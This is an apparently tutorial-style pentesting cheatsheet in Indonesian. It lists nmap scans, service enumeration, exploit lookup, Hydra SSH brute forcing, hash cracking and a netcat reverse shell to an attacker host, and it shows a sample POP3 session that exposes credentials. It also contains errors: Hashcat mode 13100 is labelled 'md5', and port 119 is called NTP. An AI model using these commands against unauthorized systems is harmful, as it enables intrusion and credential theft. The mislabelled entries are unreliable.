VA-PT Cheatsheet

Cheatsheet untuk Pentesting.

Catatan ini ditujukan untuk mempermudah pencarian payload/script tools dalam pentesting/VA.Cheatsheet ini disadur dari akun Github rekan saya Satrya Mahardhika.

5 Tahap Ethical Hacking

Metode Uji Ringkas

NMAP Command

Berikut beberapa rangkuman perintah NMAP untuk tujuan reconnaissance. (Pindah dengan klik tab)

nmap -sC -sV -p- -T4 Target IP

	nmap -sV Target_IP

	nmap -sT Target IP

	nmap -sU Target IP

nmap --vuln Target IP

NMAP Command

#	Options	Description
1	-sT	TCP Connect port scan
2	-sU	UDP Port scan
3	-p	specific port scan
4	-p-	Scan All ports
5	-sV	Check Version of running service
6	-sC	Scan with default safe Scripts
7	-O	OS Fingerprinting

Options

Description

-sT

TCP Connect port scan

-sU

UDP Port scan

-p

specific port scan

-p-

Scan All ports

-sV

Check Version of running service

-sC

Scan with default safe Scripts

-O

OS Fingerprinting

# Command Scan For

#	Command	Scan For
1	nmap -sV `Target_IP`	Open TCP Ports and versions
2	nmap -sT `Target IP`	Open TCP Ports
3	nmap -sU `Target IP`	Open UDP Ports
4	nmap -sC -sV -p- `Target IP`	Open All TCP Ports and Versions + Scan with default NSE Scripts
5	nmap --vuln `Target IP`	Scan for vulnerability ()

nmap -sV Target_IP

Open TCP Ports and versions

nmap -sT Target IP

Open TCP Ports

nmap -sU Target IP

Open UDP Ports

nmap -sC -sV -p- Target IP

Open All TCP Ports and Versions + Scan with default NSE Scripts

nmap --vuln Target IP

Scan for vulnerability ()

Anda dapat mencari script NMAP pada:

ls /usr/share/nmap/scripts

Interesting Port

Port	Deskripsi	Port	Deskripsi
21	FTP server, unencrypted.	161, 162	SNMP Service
22	SSH server, can be connected to via SSH	389, 636	LDAP Directory Service
23	Telnet. Basically an unencrypted SSH	443	HTTPS, check for HeartBleed? View certificate for information?
25	SMTP - Email sending service.	445	SMB Shares service, likely vulnerable to an SMB RCE
69	TFTP Server. Very uncommon and old. Uses UDP.	587	Submission. If Postfix is run on it, it could be vunerable to shellshock
80	HTTP Server. Try visiting IP with web browser.	631	CUPS. Basically a Linux Printer Service for sharing printers.
88	Kerberos Service. Check, MS14-068	1433	Default MSSQL port. `sqsh -S 10.1.11.41 -U sa`
110	POP3 mail service. Login via telnet or SSH?	1521	Oracle DB. `tnscmd10g version -h 10.1.11.51`
111	RPCbind. This can help us look for NFS-shares	2021	Oracle XML DB. Check Default Passwords
119	Network Time Protocol	2049	Network File System. `showmount -e 10.1.11.64`
135	MSRPC - Microsoft RPC	3306	MySQL Database. Connect: `mysql --host=10.1.11.69 -u root -p`
139	SMB Service. likely vulnerable to an SMB RCE	3389	Listening for RDP connection

Enumeration

SSH

Try connect to ssh service

ssh kali@10.131.2.128

FTP

Check for Anonymous login allowed. Use username: anonymous ; password: (blank or anything).(Pindah dengan klik tab)

ftp open Target_IP

get <nama file>

SMB

Connect ke SMB untuk mengecek Shares yang available. (Pindah dengan klik tab)

smbclient //Target_IP/Shares_name

SMTP

Verify SMTP Port using netcat

nc -nv Target_IP 25

POP3

root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean    
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2 1021

retr 1

+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z

HTTP

Anda dapat melakukan directory finding dengan dirb (+menggunakan wordlist).

dirb http://<ip target>/ /usr/share/wordlists/dirb/common.txt

Anda dapat melakukan scanning dengan Nikto. Kemudian, apabila website menggunakan CMS tertentu lakukan scan CMS (contoh WPScan). (Pindah dengan klik tab)

nikto -h http://<ip_target>

wpscan --url http://target.com

Mencari Exploit

Melalui Mesin Pencari (Google)

Perhatikan dan cari versi aplikasi yang kemungkinan rawan.
Lakukan pencarian di mesin pencari dengan format "[APLIKASI] [VERSI] [EXPLOIT]" . Contoh: "Samba 3.5.0 exploit"
Prioritaskan sumber dari ExploitDB / Github /Rapid7.
Unduh dan gunakan exploit sesuat keterangan pada sumber terkait.

Melalui Searchploit (Kali)

searchsploit linux 2.2.0
#Mencari exploit dengan keyword tertentu contoh linux 2.2.0
#Mendownload (Copy) exploit ke working directory

searchsploit -m Nomor_Exploit

wget Alamat_URL
#Download File

Bruteforce/Hash Cracking (sample)

SSH Bruteforce With Hydra

hydra -L users.txt -P pass.txt 192.168.1.181 ssh

John The Ripper common hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Hashcat crack md5

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --outfile=cracked.txt

Command Execution Guide

Reverse Shell

(Pindah dengan klik tab)

nc -nlvp 4444

nc -nv IP_Attacker Port -e /bin/bash

Sumber lain untuk membuat reverse shell disini .

Upgrade ke Interactive Shell

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
<ENTER>
<ENTER>

Sumber lain untuk interactive shell dapat dicek di Linux TTY Shell Cheat Sheet

PreviousLinux Command Intro NextNMAP Cheatsheet

Last updated 1 year ago